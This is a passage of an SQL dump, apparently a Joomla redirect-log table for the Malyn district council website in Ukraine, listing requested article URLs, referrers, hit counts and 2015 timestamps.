00:00:00',301),(17946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en&limitstart=15','','','',1,0,'2015-11-11 03:58:58','0000-00-00 00:00:00',301),(17948,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-11-11 04:44:31','0000-00-00 00:00:00',301),(17949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-11-11 05:15:12','0000-00-00 00:00:00',301),(17950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43&layout=blog&Itemid=82&lang=uk&limitstart=10','','','',2,0,'2015-11-11 08:43:55','0000-00-00 00:00:00',301),(17951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=10','','','',2,0,'2015-11-11 08:54:55','0000-00-00 00:00:00',301),(17952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=uk','','','',7,0,'2015-11-11 09:03:10','0000-00-00 00:00:00',301),(17953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=ru&limitstart=10','','','',1,0,'2015-11-11 09:07:04','0000-00-00 00:00:00',301),(17954,'http://www.malyn-rayrada.org.ua/index.php/3-vitannja-iz-svitlim-hristovim-voskresinnjam','','','',34,0,'2015-11-11 09:07:32','0000-00-00 00:00:00',301),(17955,'http://www.malyn-rayrada.org.ua/index.php/775-pro-sklikannja-30-sesii-rajonnoi-radi-6-sklikannja','','','',18,0,'2015-11-11 09:08:44','0000-00-00 00:00:00',301),(17956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=31:2010-06-09-11-52-38&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',3,0,'2015-11-11 09:09:31','0000-00-00 00:00:00',301),(17957,'http://www.malyn-rayrada.org.ua/index.php/1186-q','','','',22,0,'2015-11-11 09:32:58','0000-00-00 00:00:00',301),(17959,'http://www.malyn-rayrada.org.ua/index.php/747-gaz-dlja-naselennja-v-ukraini-z-1-travnja','','','',14,0,'2015-11-11 10:01:35','0000-00-00 00:00:00',301),(17960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&catid=43&Itemid=82&lang=en','','','',3,0,'2015-11-11 10:02:22','0000-00-00 00:00:00',301),(17961,'http://www.malyn-rayrada.org.ua/index.php/68-pro-provedennja-rajonnogo-konkursu-sered-silskih-i','','','',43,0,'2015-11-11 10:32:58','0000-00-00 00:00:00',301),(17962,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',62,0,'2015-11-11 10:34:10','0000-00-00 00:00:00',301),(17963,'http://www.malyn-rayrada.org.ua/index.php/1013-vidpovid-na-zvernennya-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 10:43:51','0000-00-00 00:00:00',301),(17964,'http://www.malyn-rayrada.org.ua/index.php/1014-20-lyutogo-2015-roku-blagodijnij-kontsert-povertajsya-zhivim?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-11 10:43:54','0000-00-00 00:00:00',301),(17965,'http://www.malyn-rayrada.org.ua/index.php/1191-dopomozheno-dityam-razom?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-11 10:44:29','0000-00-00 00:00:00',301),(17966,'http://www.malyn-rayrada.org.ua/index.php/1192-u-chajki-bronza-v-urozhayu-novij-stadion?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 10:44:36','0000-00-00 00:00:00',301),(17967,'http://www.malyn-rayrada.org.ua/index.php/1195-dibrivska-silska-rada-oprilyudnyue-informatsiyu?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-11 10:44:49','0000-00-00 00:00:00',301),(17968,'http://www.malyn-rayrada.org.ua/index.php/1209-pishov-z-zhittya-volodimir-melnichenko?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 10:44:58','0000-00-00 00:00:00',301),(17969,'http://www.malyn-rayrada.org.ua/index.php/1211-vitaemo-z-dnem-vchitelya','','','',19,0,'2015-11-11 10:45:12','0000-00-00 00:00:00',301),(17970,'http://www.malyn-rayrada.org.ua/index.php/1220-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',29,0,'2015-11-11 10:45:52','0000-00-00 00:00:00',301),(17971,'http://www.malyn-rayrada.org.ua/index.php/17-na-malinshhini-svjato-ostannogo-dzvonika','','','',18,0,'2015-11-11 10:46:14','0000-00-00 00:00:00',301),(17972,'http://www.malyn-rayrada.org.ua/index.php/1067-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',51,0,'2015-11-11 11:05:10','0000-00-00 00:00:00',301),(17973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=5','','','',7,0,'2015-11-11 11:05:14','0000-00-00 00:00:00',301),(17974,'http://www.malyn-rayrada.org.ua/index.php/388-vidbulas-16-sesija-rajonnoi-radi-6-sklikannja','','','',21,0,'2015-11-11 11:05:54','0000-00-00 00:00:00',301),(17975,'http://www.malyn-rayrada.org.ua/index.php/407-vorsivska-silska-gromada-znovu-na-zv-jazku','','','',59,0,'2015-11-11 11:07:40','0000-00-00 00:00:00',301),(17976,'http://www.malyn-rayrada.org.ua/index.php/647-9-listopada-den-ukrainskoi-pisemnosti-ta-movi','','','',14,0,'2015-11-11 11:33:32','0000-00-00 00:00:00',301),(17977,'http://www.malyn-rayrada.org.ua/index.php/391-pershi-oficijni-rezultati-viboriv_2','','','',14,0,'2015-11-11 11:34:43','0000-00-00 00:00:00',301),(17978,'http://www.malyn-rayrada.org.ua/index.php/677-zaversheno-pidgotovku-do-provedennja-chergovoi_4','','','',12,0,'2015-11-11 11:36:19','0000-00-00 00:00:00',301),(17979,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-11 11:42:02','0000-00-00 00:00:00',301),(17980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=664:-------------l-r-lr&catid=41:--27042012-&Itemid=78&lang=uk','','','',8,0,'2015-11-11 11:42:40','0000-00-00 00:00:00',301),(17981,'http://www.malyn-rayrada.org.ua/index.php/1195-dibrivska-silska-rada-oprilyudnyue-informatsiyu','','','',21,0,'2015-11-11 12:02:09','0000-00-00 00:00:00',301),(17982,'http://www.malyn-rayrada.org.ua/index.php/217-zakon-pro-misceve-samovrjaduvannja-potribno?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 12:03:04','0000-00-00 00:00:00',301),(17983,'http://www.malyn-rayrada.org.ua/index.php/264-6-ljutogo-2012-roku-vipadkove-foto?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:03:07','0000-00-00 00:00:00',301),(17984,'http://www.malyn-rayrada.org.ua/index.php/295-na-malinshhini-svjato-ostannogo-dzvonika_2','','','',40,0,'2015-11-11 12:03:11','0000-00-00 00:00:00',301),(17985,'http://www.malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:03:14','0000-00-00 00:00:00',301),(17986,'http://www.malyn-rayrada.org.ua/index.php/37-shho-minfin-vdilit-rajonu-v-2012-roci?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:03:18','0000-00-00 00:00:00',301),(17987,'http://www.malyn-rayrada.org.ua/index.php/579-ogoloshennja_7?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-11 12:03:23','0000-00-00 00:00:00',301),(17988,'http://www.malyn-rayrada.org.ua/index.php/211-vidbulas-pozachergova-15-sesija-rajonnoi-radi','','','',20,0,'2015-11-11 12:03:26','0000-00-00 00:00:00',301),(17989,'http://www.malyn-rayrada.org.ua/index.php/582-jak-vberegtisja-vid-speki-poradi-mns?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:27','0000-00-00 00:00:00',301),(17990,'http://www.malyn-rayrada.org.ua/index.php/583-rosijska-mitnicja-z-sogodnishnogo-dnja-zupinila?tmpl=component&print=1&layout=default&page=','','','',12,0,'2015-11-11 12:03:29','0000-00-00 00:00:00',301),(17991,'http://www.malyn-rayrada.org.ua/index.php/584-vidbulas-23-pozachergova-sesija-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:32','0000-00-00 00:00:00',301),(17992,'http://www.malyn-rayrada.org.ua/index.php/587-23-serpnja-v-ukraini-vidznachaetsja-den','','','',25,0,'2015-11-11 12:03:35','0000-00-00 00:00:00',301),(17993,'http://www.malyn-rayrada.org.ua/index.php/587-23-serpnja-v-ukraini-vidznachaetsja-den?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:37','0000-00-00 00:00:00',301),(17994,'http://www.malyn-rayrada.org.ua/index.php/588-vitaemo-z-dnem-nezalezhnosti-ukraini','','','',39,0,'2015-11-11 12:03:39','0000-00-00 00:00:00',301),(17995,'http://www.malyn-rayrada.org.ua/index.php/588-vitaemo-z-dnem-nezalezhnosti-ukraini?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:41','0000-00-00 00:00:00',301),(17996,'http://www.malyn-rayrada.org.ua/index.php/589-pogodzhennja-na-remont-navchalnogo-zakladu-v-smt?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:43','0000-00-00 00:00:00',301),(17997,'http://www.malyn-rayrada.org.ua/index.php/648-ogoloshennja-povtornij-konkurs?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:03:46','0000-00-00 00:00:00',301),(17998,'http://www.malyn-rayrada.org.ua/index.php/650-pro-sklikannja-25-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 12:03:48','0000-00-00 00:00:00',301),(17999,'http://www.malyn-rayrada.org.ua/index.php/652-do-vidoma-deputativ-rajonnoi-radi-z-utochnennjam?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 12:03:50','0000-00-00 00:00:00',301),(18000,'http://www.malyn-rayrada.org.ua/index.php/656-pro-vnesennja-zmin-do-rozporjadzhennja-golovi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:03:54','0000-00-00 00:00:00',301),(18001,'http://www.malyn-rayrada.org.ua/index.php/662-ogoloshennja_10','','','',26,0,'2015-11-11 12:04:01','0000-00-00 00:00:00',301),(18002,'http://www.malyn-rayrada.org.ua/index.php/662-ogoloshennja_10?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:04:03','0000-00-00 00:00:00',301),(18003,'http://www.malyn-rayrada.org.ua/index.php/677-zaversheno-pidgotovku-do-provedennja-chergovoi_4?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-11 12:04:06','0000-00-00 00:00:00',301),(18004,'http://www.malyn-rayrada.org.ua/index.php/686-zustrichaemo-novij-2014-rik-rik-sinogo-derev?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:04:09','0000-00-00 00:00:00',301),(18005,'http://www.malyn-rayrada.org.ua/index.php/710-vitalij-francuz-novij-golova-zhitomirskoi-oblasnoi','','','',24,0,'2015-11-11 12:04:11','0000-00-00 00:00:00',301),(18006,'http://www.malyn-rayrada.org.ua/index.php/710-vitalij-francuz-novij-golova-zhitomirskoi-oblasnoi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-11 12:04:13','0000-00-00 00:00:00',301),(18007,'http://www.malyn-rayrada.org.ua/index.php/593-ogoloshennja_8/','','http://go.mail.ru/search_images','',1,0,'2015-11-11 12:04:15','0000-00-00 00:00:00',301),(18008,'http://www.malyn-rayrada.org.ua/index.php/712-verhovna-rada-povernula-konstituciju-2004-roku?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-11 12:04:15','0000-00-00 00:00:00',301),(18009,'http://www.malyn-rayrada.org.ua/index.php/717-pozachergovi-vibori-prezidenta-vidbudutsja-25','','','',13,0,'2015-11-11 12:04:17','0000-00-00 00:00:00',301),(18010,'http://www.malyn-rayrada.org.ua/index.php/717-pozachergovi-vibori-prezidenta-vidbudutsja-25?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:04:19','0000-00-00 00:00:00',301),(18011,'http://www.malyn-rayrada.org.ua/index.php/724-verhovna-rada-ukraini-prijnjala-postanovu-pro?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-11 12:04:22','0000-00-00 00:00:00',301),(18012,'http://www.malyn-rayrada.org.ua/index.php/728-ogoloshennja_13?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:04:24','0000-00-00 00:00:00',301),(18013,'http://www.malyn-rayrada.org.ua/index.php/747-gaz-dlja-naselennja-v-ukraini-z-1-travnja?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-11 12:04:43','0000-00-00 00:00:00',301),(18014,'http://www.malyn-rayrada.org.ua/index.php/759-ogoloshennja_14?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-11 12:04:44','0000-00-00 00:00:00',301),(18015,'http://www.malyn-rayrada.org.ua/index.php/760-ogoloshennja_15','','','',29,0,'2015-11-11 12:04:48','0000-00-00 00:00:00',301),(18016,'http://www.malyn-rayrada.org.ua/index.php/794-vidbulas-30-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:04:54','0000-00-00 00:00:00',301),(18017,'http://www.malyn-rayrada.org.ua/index.php/86-14-zhovtnja-den-ukrainskogo-kozactva?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:05:06','0000-00-00 00:00:00',301),(18018,'http://www.malyn-rayrada.org.ua/index.php/883-vitaemo-osvityan-iz-profesijnim-svyatom?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-11 12:05:13','0000-00-00 00:00:00',301),(18019,'http://www.malyn-rayrada.org.ua/index.php/884-vidbulas-koordinatsijna-rada-pri-golovi-malinskoji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 12:05:14','0000-00-00 00:00:00',301),(18020,'http://www.malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 12:05:16','0000-00-00 00:00:00',301),(18021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=592:2012-02-27-15-06-10&catid=36&Itemid=70&lang=en','','','',3,0,'2015-11-11 12:05:19','0000-00-00 00:00:00',301),(18022,'http://www.malyn-rayrada.org.ua/index.php/888-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-9-misyatsiv-2014-roku?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 12:05:21','0000-00-00 00:00:00',301),(18023,'http://www.malyn-rayrada.org.ua/index.php/897-vitaemo-oleksiya-grigorovicha-iz-vpevnenoyu-peremogoyu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 12:05:38','0000-00-00 00:00:00',301),(18024,'http://www.malyn-rayrada.org.ua/index.php/952-grodadske-ob-ednannya-malinshchina-informue','','','',23,0,'2015-11-11 12:05:58','0000-00-00 00:00:00',301),(18025,'http://www.malyn-rayrada.org.ua/index.php/952-grodadske-ob-ednannya-malinshchina-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 12:06:00','0000-00-00 00:00:00',301),(18026,'http://www.malyn-rayrada.org.ua/index.php/499-za-materialami-zvernen-rajonnoi-radi_2','','','',20,0,'2015-11-11 13:18:28','0000-00-00 00:00:00',301),(18027,'http://www.malyn-rayrada.org.ua/index.php/628-girnichovidobuvni-pidpriemstva-oblasti-pid','','','',16,0,'2015-11-11 13:19:40','0000-00-00 00:00:00',301),(18028,'http://malyn-rayrada.org.ua/index.php/590-pro-sklikannja-24-sesii-rajonnoi-radi-6-sklikannja','','','',2,0,'2015-11-11 13:24:26','0000-00-00 00:00:00',301),(18029,'http://www.malyn-rayrada.org.ua/index.php/366-do-vidoma-zhiteliv-mista-ta-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 13:24:33','0000-00-00 00:00:00',301),(18030,'http://www.malyn-rayrada.org.ua/index.php/386-pershi-oficijni-rezultati-viboriv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 13:24:35','0000-00-00 00:00:00',301),(18031,'http://www.malyn-rayrada.org.ua/index.php/558-27-sesija-rajonnoi-radi-vidbudetsja-4-ljutogo-2014?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 13:24:39','0000-00-00 00:00:00',301),(18032,'http://www.malyn-rayrada.org.ua/index.php/568-ogoloshennja_5','','','',21,0,'2015-11-11 13:24:42','0000-00-00 00:00:00',301),(18033,'http://www.malyn-rayrada.org.ua/index.php/620-z-svjatom-osvitjani?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 13:24:47','0000-00-00 00:00:00',301),(18034,'http://www.malyn-rayrada.org.ua/index.php/621-miscevi-avtodorogi-peredadut','','','',28,0,'2015-11-11 13:24:50','0000-00-00 00:00:00',301),(18035,'http://www.malyn-rayrada.org.ua/index.php/621-miscevi-avtodorogi-peredadut?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-11 13:24:53','0000-00-00 00:00:00',301),(18036,'http://www.malyn-rayrada.org.ua/index.php/622-malinske-viddilennja-dai-udai-umvs-ukraini-v?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-11 13:24:55','0000-00-00 00:00:00',301),(18037,'http://www.malyn-rayrada.org.ua/index.php/625-cvjato-pokrovi-presvjatoi-bogorodici-u-vorsivci?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 13:24:58','0000-00-00 00:00:00',301),(18038,'http://www.malyn-rayrada.org.ua/index.php/627-informacija-pro-vikonannja-dohidnoi-chastini?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 13:25:00','0000-00-00 00:00:00',301),(18039,'http://www.malyn-rayrada.org.ua/index.php/637-vidbulos-zasidannja-24-sesii-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 13:25:02','0000-00-00 00:00:00',301),(18040,'http://www.malyn-rayrada.org.ua/index.php/638-perevedit-strilki-godinnikiv-na-1-godinu-nazad','','','',32,0,'2015-11-11 13:25:05','0000-00-00 00:00:00',301),(18041,'http://www.malyn-rayrada.org.ua/index.php/638-perevedit-strilki-godinnikiv-na-1-godinu-nazad?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 13:25:08','0000-00-00 00:00:00',301),(18042,'http://www.malyn-rayrada.org.ua/index.php/640-upravlinnja-statistiki-informue_3','','','',28,0,'2015-11-11 13:25:11','0000-00-00 00:00:00',301),(18043,'http://www.malyn-rayrada.org.ua/index.php/640-upravlinnja-statistiki-informue_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 13:25:13','0000-00-00 00:00:00',301),(18044,'http://www.malyn-rayrada.org.ua/index.php/642-vijshli-na-finishnu-prjamu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 13:25:16','0000-00-00 00:00:00',301),(18045,'http://www.malyn-rayrada.org.ua/index.php/643-ogoloshennja_9?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-11 13:25:18','0000-00-00 00:00:00',301),(18046,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/379-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_9','','https://www.google.com.ua/','',7,0,'2015-11-11 13:42:25','0000-00-00 00:00:00',301),(18047,'http://www.malyn-rayrada.org.ua/index.php/1185-problemu-potribno-virishuvati-spilno','','','',27,0,'2015-11-11 13:43:26','0000-00-00 00:00:00',301),(18048,'http://www.malyn-rayrada.org.ua/index.php/31-vistup-ansamblju-kozackoi-pisni-malichi-24-serpnja','','','',18,0,'2015-11-11 13:43:54','0000-00-00 00:00:00',301),(18049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=720:-l-r&catid=43:--25072012-&Itemid=82&lang=uk','','','',6,0,'2015-11-11 13:46:41','0000-00-00 00:00:00',301),(18050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=640:2012-04-03-12-44-22&catid=42:--16052012-&Itemid=80&lang=ru','','','',5,0,'2015-11-11 13:47:29','0000-00-00 00:00:00',301),(18051,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=en&Itemid=','','','',3,0,'2015-11-11 13:48:41','0000-00-00 00:00:00',301),(18052,'http://www.malyn-rayrada.org.ua/index.php/303-novij-direktor-malinskoi-ditjachoi-shkoli-mistectv','','','',22,0,'2015-11-11 14:07:21','0000-00-00 00:00:00',301),(18053,'http://www.malyn-rayrada.org.ua/index.php/522-nardep-v-s-zhuravskij-prosit-vid-m-ja-azarova','','','',26,0,'2015-11-11 14:09:44','0000-00-00 00:00:00',301),(18054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=52:2010-06-17-12-34-08&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',6,0,'2015-11-11 14:11:19','0000-00-00 00:00:00',301),(18055,'http://www.malyn-rayrada.org.ua/index.php/1074-do-vidoma-silskikh-ta-selishchnikh-rad-roz-yaznennya-tsvk','','','',16,0,'2015-11-11 14:34:22','0000-00-00 00:00:00',301),(18056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37:--21102011-&Itemid=72&lang=uk','','','',10,0,'2015-11-11 14:58:12','0000-00-00 00:00:00',301),(18057,'http://www.malyn-rayrada.org.ua/index.php/1107-umovi-spozhivchogo-kredituvannya-oshchadbankom-fizichnikh-osib-na-pridbannya-energozberigayuchogo-obladnannya-ta-materialiv','','https://www.google.com/','',31,0,'2015-11-11 15:51:01','0000-00-00 00:00:00',301),(18058,'http://www.malyn-rayrada.org.ua/index.php/1132-zastupnik-keruyuchogo-nachalnik-viddilu-rozvitku-bankivskogo-biznesu-tvbv-10005-038-filiji-zhitomirskogo-oblasnogo-upravlinnya-at-oshchadbank-mikhajlenko-s-m-informue','','','',21,0,'2015-11-11 15:57:25','0000-00-00 00:00:00',301),(18059,'http://www.malyn-rayrada.org.ua/index.php/1113-pomer-kulchitskij-josip-lyudvigovich-pochesnij-gromadyanin-malina','','http://www.malyn-rayrada.org.ua/','',20,0,'2015-11-11 15:57:50','0000-00-00 00:00:00',301),(18060,'http://www.malyn-rayrada.org.ua/index.php/516-zaversheno-pidgotovku-do-provedennja-20-sesii','','','',11,0,'2015-11-11 16:48:23','0000-00-00 00:00:00',301),(18061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=680:2012-05-17-10-02-41&catid=42:--16052012-&Itemid=80&lang=uk','','','',7,0,'2015-11-11 16:48:24','0000-00-00 00:00:00',301),(18062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:---------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-11-11 16:48:24','0000-00-00 00:00:00',301),(18063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:-2012-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-11-11 16:48:25','0000-00-00 00:00:00',301),(18064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=552:2012-01-26-12-47-12&catid=39&Itemid=76&lang=uk','','','',11,0,'2015-11-11 16:48:25','0000-00-00 00:00:00',301),(18065,'http://www.malyn-rayrada.org.ua/index.php/771-golova-oda-kizin-s-v-predstaviv-aktivu-rajonu-ta','','','',25,0,'2015-11-11 16:48:26','0000-00-00 00:00:00',301),(18066,'http://www.malyn-rayrada.org.ua/index.php/517-vidbulas-20-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-11 16:48:26','0000-00-00 00:00:00',301),(18067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=545:2012-01-26-12-06-01&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2015-11-11 16:48:26','0000-00-00 00:00:00',301),(18068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=718:2012-06-14-15-24-50&catid=43&Itemid=82&lang=uk','','','',12,0,'2015-11-11 16:48:27','0000-00-00 00:00:00',301),(18069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=ru','','','',1,0,'2015-11-11 16:48:29','0000-00-00 00:00:00',301),(18070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-11 16:48:29','0000-00-00 00:00:00',301),(18071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-11-11 16:48:30','0000-00-00 00:00:00',301),(18072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=43&Itemid=82&lang=ru','','','',1,0,'2015-11-11 16:48:32','0000-00-00 00:00:00',301),(18073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=en','','','',1,0,'2015-11-11 16:48:33','0000-00-00 00:00:00',301),(18074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=uk','','','',10,0,'2015-11-11 16:48:33','0000-00-00 00:00:00',301),(18075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42:--16052012-&Itemid=80&lang=ru','','','',14,0,'2015-11-11 16:48:52','0000-00-00 00:00:00',301),(18076,'http://www.malyn-rayrada.org.ua/index.php/517-vidbulas-20-sesija-rajonnoi-radi','','','',18,0,'2015-11-11 16:48:54','0000-00-00 00:00:00',301),(18077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:------27042012252&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-11-11 16:48:58','0000-00-00 00:00:00',301),(18078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=541:2012-01-26-11-55-32&catid=39&Itemid=76&lang=ru','','','',2,0,'2015-11-11 16:48:58','0000-00-00 00:00:00',301),(18079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=ru','','','',5,0,'2015-11-11 16:49:01','0000-00-00 00:00:00',301),(18080,'http://www.malyn-rayrada.org.ua/index.php/564-za-materialami-zvernen-po-medreformi','','','',20,0,'2015-11-11 16:49:03','0000-00-00 00:00:00',301),(18081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=285:2011-04-13-11-02-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-11-11 16:49:05','0000-00-00 00:00:00',301),(18082,'http://www.malyn-rayrada.org.ua/index.php/579-ogoloshennja_7','','','',27,0,'2015-11-11 16:49:24','0000-00-00 00:00:00',301),(18083,'http://www.malyn-rayrada.org.ua/index.php/583-rosijska-mitnicja-z-sogodnishnogo-dnja-zupinila','','','',28,0,'2015-11-11 16:49:26','0000-00-00 00:00:00',301),(18084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&catid=45:--14112012-&Itemid=84&lang=uk','','','',17,0,'2015-11-11 16:49:31','0000-00-00 00:00:00',301),(18085,'http://www.malyn-rayrada.org.ua/index.php/883-vitaemo-osvityan-iz-profesijnim-svyatom','','','',41,0,'2015-11-11 16:49:34','0000-00-00 00:00:00',301),(18086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2015-11-11 16:49:35','0000-00-00 00:00:00',301),(18087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=ru','','','',22,0,'2015-11-11 16:49:56','0000-00-00 00:00:00',301),(18088,'http://www.malyn-rayrada.org.ua/index.php/1105-vidnovleno-avtobusnij-marshrut','','','',18,0,'2015-11-11 16:49:59','0000-00-00 00:00:00',301),(18089,'http://www.malyn-rayrada.org.ua/index.php/843-vistup-prezidenta-na-paradi-na-chest-23-i-richnici','','','',10,0,'2015-11-11 16:49:59','0000-00-00 00:00:00',301),(18090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-11 16:50:00','0000-00-00 